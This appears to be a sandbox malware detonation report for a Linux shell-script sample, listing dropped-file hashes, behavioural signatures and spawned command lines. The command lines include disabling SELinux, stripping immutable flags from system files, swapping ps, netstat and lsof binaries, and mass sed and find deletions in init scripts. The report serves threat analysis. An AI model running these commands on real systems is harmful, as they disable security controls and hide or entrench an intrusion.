| SHA1 | 0f667545ae788ae46ccc7045dc7975f044a76fd2 |
| SHA256 | a4fecda40d06d41cab9892b8c2832d3f41d333d944a91a9bc7334540d1cada26 |
| SHA512 | 3fdcaea110abc6d7be70f52341ff7f523de70afa571ccdc88cdf6e1fab264cae2f70fa2cd8be0ccaa9de0cae2db9baa6139fb951f78e50a78a7ac1d7afb06821 |
/etc/init.d/sedzJUsG1
| MD5 | 85d7a3783889ea93dcda2fb488420c1c |
| SHA1 | 8edf95b211ad7e8df3ee2a331c4e658e9b746e5c |
| SHA256 | 2df15277374dedbff7fb792f22e42a72c75fbfc73414ccc87e07f49d377ad9d0 |
| SHA512 | 9abf28183e952b372423ec48c3b20cd218cfd76b50138ced0dd1969f7be66e0697cbcaee28d71984c46369ea14f9a62a8061ee992ddc2ca2b186c87b689dc3e9 |
/etc/init.d/seduODJR1
| MD5 | e65fcf1c65d0f1dfd2495caba916da2c |
| SHA1 | 954ce99138d3ba784163c8aaf940697b5052a1f2 |
| SHA256 | 2117dc14baa0865740861453d359ff186d793a82ee9d8cb848f673814b114ed5 |
| SHA512 | 1b8a2c9cb7a435326ac3281d22346acc648096a59a6cf94b8a9f5063ce3341c3e2b5e527477d7554862f57776798d2e5d002a90f024cb3e8514cc16bb919cceb |
/etc/init.d/sedf0ume1
| MD5 | 193d680f0eec5280efef2e9cf9db9669 |
| SHA1 | 775d985dd5e016882657620a66aa149ac438a25f |
| SHA256 | ff9fe5260a3acc455c3c52f7812b167d7f3010ad24bcf23c0f4bed6eee92bbb2 |
| SHA512 | 655cafe8366a5e3327a1335c18af3c00fa6fdfef0ec5d3e2aa46634272842abd89732b59705ec291f5ccc2fdfa2412e1bf0dadc809958e8672180e1abf2be076 |
/etc/init.d/seduA5xv0
| MD5 | ec9a7d183ec50837a12aca3f9c95cc27 |
| SHA1 | 396a23fa1d6e8a871d69786d14fd1ce4e4cba583 |
| SHA256 | c82a6b52fad02e7f7e33184a9b917fe966b20eb6afce27fb3b8c6e799f8df8a0 |
| SHA512 | ec1f384a5bc7e2a67b99838644346ea1391b5b75e7bcc1a1ea6d59f07418da7553175c8f43869ff352c0b7aa80cb26ccdc5f42c3dde9029917cebc520a19e85b |
/etc/init.d/sedPHaP3Z
| MD5 | a9ad994be904ef8c646c6044e01cb30a |
| SHA1 | 2e87087451b7e04f64209d66c25ae1c12ab25f49 |
| SHA256 | f90e0e478d4343071c2367319db5145621924b293bd81da4310abd22ff4ceb3f |
| SHA512 | d9bffc5c302126b65e32f34c564f2b5c5e28705a196ae8e50ba7583e7c3849d76d98cc024ed5faa805f921479a425e1bca06f1c49106be78a01f94c790b7cfbb |
/etc/init.d/sedivgDd0
| MD5 | 9932c03664a6acd9f23afdbcf91478cb |
| SHA1 | 73b78fcd63c788f1a977c604a760eae6f8f60881 |
| SHA256 | 1711fba8077fe12a1db8f26e0f06f32ee06921029deb0be773368878e135832a |
| SHA512 | 7a0432d9a5da508df34691091a0de13a4c009a5ec9d479eb5b55bde2d3e5c3fad1f0fa423a67b618246e5af83c163da52b49908a772b7a499f2cbec23e5229d2 |
/etc/init.d/sed9jkXc4
| MD5 | 561b38cf0171ef9aa41954dad9ec6b3c |
| SHA1 | 93db75a3b83ab12a3cd8859d5417e8ba036f0241 |
| SHA256 | 6b0c5c1234b1f749b4af91bc9bbbd9989d98b267fae416a495891937e010c67b |
| SHA512 | 2b0f9eb9fde3f7a8f8d3ff286acfc034d5c046da789ed25ce29540b8ca89b6fb86cf44c6d8823423d9515dc20400f49016676c4a940640a2384bb87902e125d1 |
/etc/init.d/sedItU9o3
| MD5 | 1ca5c0743fa797ffa364db95bb8d8d8e |
| SHA1 | 6de496930dfe00e705fa244d77e7dfa2d1c6aef8 |
| SHA256 | a919f9434b681974a2f1d4120af10c0527b30e8cda6fdec1dea1eee3077b6609 |
| SHA512 | 044c6136b2085066e71f15a942b341c54fcfe97f754a10d6e91971c150214e9be014cb96e83d8ae4dee51129f5b44a41c663598f9430e9c4cc93f5675b625b5f |
/etc/init.d/sed7uNT72
| MD5 | 341bea96d3abe6f0dd2a67af3442fbc6 |
| SHA1 | 0b2afe13ecb26b68db5b4227fd56c93a87cbc5db |
| SHA256 | 30796f5c362f7c7503e7dec44c7bf66ae9f9949c087f094cb946439480648136 |
| SHA512 | 4c6747ff899b8e5b101cd58b29094a59627f2466376835856b5425abfd832617ee13eb50b70cf2d7fb09e2957726acd0a3a985a358dd3bf637e52a0fd689779d |
/etc/init.d/sedIOKVd3
| MD5 | 2e43c47bae9d14535654c575776a3d69 |
| SHA1 | 1d6838ee128ed25b278ce57d23a3eacf27c3e3aa |
| SHA256 | f6421e3b8d3a526047f8f613af03493ec5cb2cee15bac760385bd658a5a86497 |
| SHA512 | 0531a9ba9646cf97eae0028ac9ac273dda5cf7cb7ff95d2c079d2dacd80e99a72fb1cc5106171a3f1fa2cacc8120fc30a557aab8bca4e0ffba6890e958f61013 |
/etc/init.d/sedHcZzv2
| MD5 | b868200c6e36ef87e27ead9a3ddad2db |
| SHA1 | b1cc85e63d4302b020a4679971b6c363c9392d63 |
| SHA256 | 5895801d6256ce6c2a65760e01db8ffd8b90a9bf80294e9a358423b3d4ce59d1 |
| SHA512 | f3dba21b0bb340c4742e5facd042180d66541010cc25f00e223cf545a78550184571951f5ac6c7c35a3840d08a6a07f89e78316c9f7cb65108c0558c3a5e9d0a |
/etc/init.d/sed4AVVs6
| MD5 | 82698019c962069b438bd2a82d9fa1e7 |
| SHA1 | 2ad758cc8614f4c8368e8e7eb71b92f0ff2e8305 |
| SHA256 | 65044cf080c0edd9bd6ba75e1a8e8d0f300930d590257c6d6ce28273899ad4a7 |
| SHA512 | dd64cd1f33f2cf09867363234e6791a3ebc3697aaef0d659e8e354c52fa9c4fc1c013369b28a42a831552eb888e2635e9a5d77c6619691af097c9fd2e4f0e9a9 |
/etc/init.d/sedVHPgf6
| MD5 | 27013efdfe13470845c70a9e00a61fde |
| SHA1 | 2b840ac1a1d1b866ba457bd0746144c431e944ad |
| SHA256 | c02921f45d52f6e5f324cc2cdd3cb9a00198a5b5e979cc501b16eec6a786e7f0 |
| SHA512 | 0fd9e4da5dc1702970cc7b05fff801784ddeebb772f0f3b49b2e034a4927eabef1d5864345687d16388a1d59b71e7b4628978dcbdf113577413130a73d181b1d |
/etc/init.d/sedqSWgm6
| MD5 | 84d429bf52701edbd6535020d8dcebd1 |
| SHA1 | d4070380d612001c0acf1abba7d685b1b13ec520 |
| SHA256 | 49272b0c0e7f45878a80e5918f571e0ba40c03448a6617b1cdfe5d70b212c845 |
| SHA512 | cfa58a71d870ce9b6a4a8be75b19670d78dfcc8cdee5489fb098f7f00a05efb72d7c92895189932088e9c2713d600a6fa7cb7a4f9edba5bd768ce6bc811fb09a |
/etc/init.d/sedFhHFT5
| MD5 | 7603d0f581e54fdbe31ad62cbb4cfd22 |
| SHA1 | 3f9c40e180498da01e426ffb72a31b876e1869fc |
| SHA256 | 8b9ff7abb9fffe88c146471c36494d98d5a114aef3e298db8314b31d9e15a881 |
| SHA512 | 1a98ccdadde843e6a17c97b9f5182d94cc1250d8161adc29288228d727e5c79b06aa823a3637a1489b74c32a73b643ba4355e07f5e7aba61fa8174ae1b917ded |
/etc/init.d/sed6ZnCQ4
| MD5 | 0f1be14b21796a952e115c03a86787e0 |
| SHA1 | 1d25f0167fc186ce422a03dafbdf05a9994950bc |
| SHA256 | d5345e824e0865f6f5615d8602e9141bcec1942549b3ef8792bfc17746998c84 |
| SHA512 | 670fd1216b5863f26a71a939f5f072b664674acf250a87aef8b2af06aa3525cf72e256ab4507b2c5d68656c01f23bad2d28889f30117fc6b0fc07a1843baaff5 |
/etc/init.d/sedHZKD74
| MD5 | 4ed1a6fd54897767efb2cfef6062e376 |
| SHA1 | a97d0e6f607c40f1f9b568b574c4d3b3141d7d79 |
| SHA256 | 33213290a470b25b03b9cc9e16ccdd2cdd7991b795a1f59e277626b909bb42d4 |
| SHA512 | c4e79cd2ba8ad768a299b29bbfce3e35bd8a0172f47d89d9fb4e75aaf67bb1eae3772b4988daeb8d9dff1e9e9b7024d2973162e58858845f5170ca55bf0d660b |
/etc/init.d/sedSqez28
| MD5 | 49fbfd237be2a2f09576f1f9374580be |
| SHA1 | e380716a856a90f5643ddd6f3655020fc2f603dd |
| SHA256 | 69219f70b7b70dacbce2f4a0fd9b2f7ac05623a285ae7abf1e798fdb72fac02e |
| SHA512 | b6f37481d2397b79fa47e23435626166c9857a78d19b755703e867b7401fa066122d898b4d303c6629d154bd1ed19f486146878ff5fafbe1e020e821c4835cea |
/etc/init.d/sedBeMLr8
| MD5 | c5d89677f904551f5b192f35ad98d73c |
| SHA1 | 855933c89b14174a8464633fc24e0867f5927cde |
| SHA256 | 0f4cd7733d737a110b8a48c46582ab2f88da69d32b47cffeec948f75daa0232f |
| SHA512 | 62301cd1cef7801c41f5dbc58daa0c8167d8a9aa9c1c05cf190cd8f834a872e27fd28825f23edd6a3a8a5879d4c8a8409580d4449c807651a95f6f205eeda103 |
/etc/init.d/sedWFScV8
| MD5 | bd41a0654a192d74dfb9c551b06fa855 |
| SHA1 | 08e34ce46a988013dd451e21178a517388a02101 |
| SHA256 | 98307d07a6e740050c06fcc3f7f95320d8865d73f6b95ac903e3dfccdbcf81f8 |
| SHA512 | d3c2a56eb76a32554b987c5a6a7e84a5780041c9f54682052bbb94e217af84c11f65827749171f457cf14c733719ad090511f606ee4afee1aabc9e966ec9b849 |
/etc/init.d/sedpoTtb8
| MD5 | 0e7858707b622c18dbd8dd8e39303c44 |
| SHA1 | d39af3eea63f2f5d001491d1f0f11e6f171c6b1d |
| SHA256 | dc7e0cbeec303c02cc4da4dcd19fdf749a7824b52d5f891f52484f1551ac9f5d |
| SHA512 | 88a2b42925fe8c2082de8b03fe218bcc848488653ecd9c8eca43ddf9906c39566a8a845fcfe32b0056bced5a4c76cb6d908a1c772a679cac18cd631e723fa419 |
/etc/init.d/sedEGBpj7
| MD5 | f1efa76005a42f5d6736dfb2f7fda02e |
| SHA1 | fbb0fa9c5073732a1c69d3349534c380fa13ffc9 |
| SHA256 | 70637da86bb196291f687c0e8b2276dd92b1d8e1b7fe6a4b507ce90e5a74fd4c |
| SHA512 | 211b78fe6a71b212847a139583cbb8fb99adb453d85a0d35a752e54d22d60c5392273637d96ad3dead5afb4148589eafc3c41ad6f871abb2bb9eb5ee2e4d8bfc |
/etc/init.d/sedniYnE7
| MD5 | 2f220a9e28aaf30a8250410622599d53 |
| SHA1 | 6f8f0a918c62a5ce8129ff479f5ded293cba34d9 |
| SHA256 | 026f26971b2fc4221ab1c30af5ebc61b0b07042bd2ddc98c470b8d897f38119f |
| SHA512 | 5895ee7345ea1dc3849362beb997ff29a14e6a005c697376f9629855956fee7b35d35ac76070d39a1e357dd2ea887f5c74646eb9c1eecf7a3a685fa98545a072 |
/etc/init.d/sed6AQ9Lb
| MD5 | a2fba832eab9066d85f27ee56ac9fad4 |
| SHA1 | 1a52a8f623f7fdb8e2bbc2f8d4034677be09e117 |
| SHA256 | f123397655c0e07f05204406a387b15213cdc1fd5369b7313f5f79ea564c010a |
| SHA512 | d5a0742c684b24031b4c7dcd039eb28f61d7e764cd014d1e015bb7d099d1a665dc3b1232208c5b927e5ace79c111f1e159892b0a6c4bd4c33018d0e7792a73d1 |
/etc/init.d/sedxP3LUa
| MD5 | 64d52dbd33144a38e8d4a837f6cec726 |
| SHA1 | f036ecda9f5273ad153d09c9e36a72f68a7bdbba |
| SHA256 | c4759ed3515fdf2b109d8d42f9d0e258eb6a47051183b13d06f3cf9a180e3298 |
| SHA512 | 3f473644d1f85053d07c87dbc3ae6a06587faa340c5e954f0a9e4b8f76e714f26324b9017ebc82041f32db32453197fa21c3467f0f91cf41f3726f928f05e51c |
/etc/init.d/sedAPrblb
| MD5 | c7723dd7bb64ea6711974e3fd584c81c |
| SHA1 | d8a8cbd79aee3b80b9493958e480e1763c59eac1 |
| SHA256 | 4018b896571176b9a625404cd89e402ca876b2a754073f1d4802cc59c01ef981 |
| SHA512 | 493f4fdb0a523e3e8c41e82359f6e932d837d414e30da0fb05699fdd14470fc71f8d6d0a3f2ca85f12a847637a7107034338e4c0f5c3b2ce2efe12a8d4d9b90e |
/etc/init.d/sedpxfBNa
| MD5 | 4156943ab8a824fcf4b04cc1362eb230 |
| SHA1 | f70925b017b133e308dd28655aecb7a355e03940 |
| SHA256 | 619b2c1d55f37ff0e5bedd273d0d13becb54400227dc60e7f544e5a02f7630b1 |
| SHA512 | aa43089c6a5d70f84349e8cb5183c2dce76894c4b14844f064392876bca422681b6d9d91c1528028db7a2c334c74cc38ae0855b31f7ea9d4cb58b558f2dc0a25 |
/etc/init.d/sedkz6RZ9
| MD5 | 290829a5efc55b7c435de0bb769f217b |
| SHA1 | 58663cd782ebfd62cfd1dbc05101767f1cddae46 |
| SHA256 | c30f6bd228f6a19050e80727800f3e848b99005e2e3c54ff6e210bab4093e449 |
| SHA512 | 3703dad2b8a8eade00c4bbe54b774dd35562877cbb475cf04c7bca96a5421129dfe95b82df692e7fb415a5e0319eb831a55149eda7e953816aaa88ebb2c2a27a |
/etc/init.d/sed0GUKie
| MD5 | 29b6e6ae2de1365c06806e18f18d8fab |
| SHA1 | 2d0509721648303a8bac612273c63c938fe8e253 |
| SHA256 | 4b93a446c6094a1ea265699d794171f358ea611d974eae6f728652c81e3df6ad |
| SHA512 | 3555a9c2be5953f2de10f06f65c45252e2fc9a7c769a15d80a5cc7652bb1ffc8797be2567bf19efe2fc23175b21021d51b9fe25556b0e13076e3afdc9b7c7693 |
/etc/init.d/sedZQsazd
| MD5 | a1f3d5bd15f8b85ab00fbcb827c0f0c4 |
| SHA1 | 4a4ef62a4c2397bc70eac13898145939569268a0 |
| SHA256 | 963c10b500751772551368cfa5496de7f199fa217445f27a1258aa9fde1ba53c |
| SHA512 | eef2cea41785a972b586d63fc56dbe40c5d3a09387ffd929d311577c5bd861ad73a6e561b011a7dad61dee6c23f35a081cd298579dbbb5fbb20057a7d98ee9ac |
/etc/init.d/sedQvKbJd
| MD5 | 4bf46072f9f13b2e38d58a053def37d5 |
| SHA1 | 94e4b56f7a5d40a40f256a474e244642ad778a4e |
| SHA256 | a6ef18d6a1b3f33cb3df0dce41759bda88e3133d249e6c13848fb0a007654cbf |
| SHA512 | 0ffe565c26cf1585a0d26f47328fca2d886fc33b43537f4674d0f13d6eee3f39775fa0115e8b3606148665807540244e517d7c10130c161e7191172a76a031de |
/tmp/sh-thd.BubyqF
| MD5 | 2ff9930962f5ed39a68bfabddc3551ac |
| SHA1 | 9f99fbefee4a609f403025ed510c2fa93982303b |
| SHA256 | d00546c6e26a2f1e7c7ae24a5173fb58b3d7e060d4920b7a7ba772bc76e956f7 |
| SHA512 | 6b6cd3c027e2b1b3b19519a413b96f15d4dc5579f30b61919e1ab7f2e1273141dec54d8b21cf49a8b89815d3cd9694354788a13ec651e0479eb70a53f576d1df |
/etc/init.d/crontabs
| MD5 | f21f5717d956b60f695d350bbab05716 |
| SHA1 | 1155f2cf27dc56f0e981ab78517dbf6d1b45d72f |
| SHA256 | c19b0543ff2a66484d54268c27defcd2a8d5b9ac26e267c73dace034ac21931e |
| SHA512 | 2bdf31983a48991dc7de0c2d25cb97a032fc6fd29fe1534536b9e910504a6d1317d83c935ad92bab979065da81f4f2c6218b7d2f5df31ffcc8190952a49e9ba2 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 23:20
Reported
2024-11-13 23:23
Platform
debian9-armhf-20240418-en
Max time kernel
149s
Max time network
13s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sed | N/A |
Attempts to change immutable files
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
Disables SELinux
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/sbin/setenforce | N/A |
Enumerates running processes
Modifies init.d
| Description | Indicator | Process | Target |
| File opened for modification | /etc/init.d/sedxXliUx | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedxJDWUg | /bin/sed | N/A |
| File opened for modification | /etc/init.d/selinux | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
| File opened for modification | /etc/init.d/crontabs | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
| File opened for modification | /etc/init.d/sedXptBrl | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedqz14Ln | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedQAct27 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedjSL3gO | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed1G2Nou | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedKYm7AI | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedkEQzHQ | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedO2yYB2 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed3w2aIn | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedAWxBX7 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed4Pejsj | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedshh05b | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedNfkxxe | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedEf5nzK | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedJgobeX | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedQjVLAv | /bin/sed | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/267/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/678/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/18/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/11/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/29/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/317/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/15/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/5/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/19/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/42/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/217/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/647/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/6/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/12/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/9/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/15/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/308/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/22/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/152/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/7/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/308/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/595/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/641/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/43/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/27/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/317/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/find | N/A |
| File opened for reading | /proc/6/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/318/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/142/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/304/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/15/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/find | N/A |
| File opened for reading | /proc/28/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/304/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/20/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/2/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/27/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/748/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/269/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/5/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/110/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/640/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/635/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/143/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/2/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/12/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/143/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/678/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/319/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/19/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/267/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/642/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/28/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/269/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/757/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/15/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/636/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/273/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/268/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/43/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/647/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/318/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/3/status | /usr/bin/pkill | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/sh-thd.QtKxCq | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
| File opened for modification | /tmp/sh-thd.JBfcky | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
Processes
/tmp/HMtWYpJGZVUZkrQK.sh
[/tmp/HMtWYpJGZVUZkrQK.sh]
/usr/sbin/setenforce
[setenforce 0]
/usr/bin/find
[find / -maxdepth 1 -name *.mod]
/usr/bin/chattr
[chattr -ia /bin/ps]
/usr/bin/chattr
[chattr -ia /usr/bin]
/usr/bin/chattr
[chattr -ia /etc/crontab]
/bin/cp
[cp -f /usr/bin/dpkgd/ps /usr/bin/ps]
/bin/cp
[cp -f /usr/bin/dpkgd/netstat /usr/bin/netstat]
/bin/cp
[cp -f /usr/bin/dpkgd/lsof /usr/bin/lsof]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/crontab]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/alsa-utils]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/atd]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/auditd]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/console-setup.sh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/cron]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/dbus]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/exim4]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/hwclock.sh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/keyboard-setup.sh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/kmod]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/networking]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/procps]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/rsyslog]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/selinux-autorelabel]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/ssh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/sudo]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/udev]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/x11-common]
/bin/mount
[mount]
/bin/grep
[grep -o /proc/[0-9]\+]
/usr/bin/sort
[sort -u]
/usr/bin/find
[find /etc/rc1.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc1.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc1.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc1.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
